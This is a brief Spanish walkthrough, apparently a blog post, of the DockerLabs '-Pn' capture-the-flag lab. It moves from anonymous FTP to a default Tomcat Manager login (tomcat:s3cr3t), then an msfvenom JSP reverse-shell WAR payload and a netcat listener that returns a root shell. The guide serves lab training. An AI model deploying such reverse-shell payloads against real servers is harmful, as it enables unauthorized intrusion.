romabri@home:~$

-Pn - DockerLabs

Video de YouTube

OS Dificultad Creator
Linux Fácil ElPinguinoDeMario

Escaneo y Reconocimiento de puertos

Vamos a iniciar nuestro reconocimiento con un rápido escaneo de nmap.

image

Vemos que esta abierto el puerto 21 FTPy el puerto 8080 HTTPS

FTP

ftp 172.17.0.2

image

Vemos que en el repositorio tenemos un archivo llamado tomcat.txt vamos a descargarlo.

image

Puerto 8080

Si vamos a Manager Apps nos pide un usuario y una contraseña

Vamos a buscarlo en HackTricks y encontramos una serie de contraseñas default y esta funciona tomcat:s3cr3t

image

Para explotar tomcat usaremos un archivo war que nos devolverá una reverse shell.

Para hacer esto lo generamos asi

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

Ahora le damos a browse, seleccionamos el archivo war que hemos generado y le damos a deploy.

Nos ponemos en escucha con net cat

nc -lvnp [Puerto]

Si le damos click ahí nos va a mandar la reverse shell

image

Al recibir la conexión ya seremos ROOT

image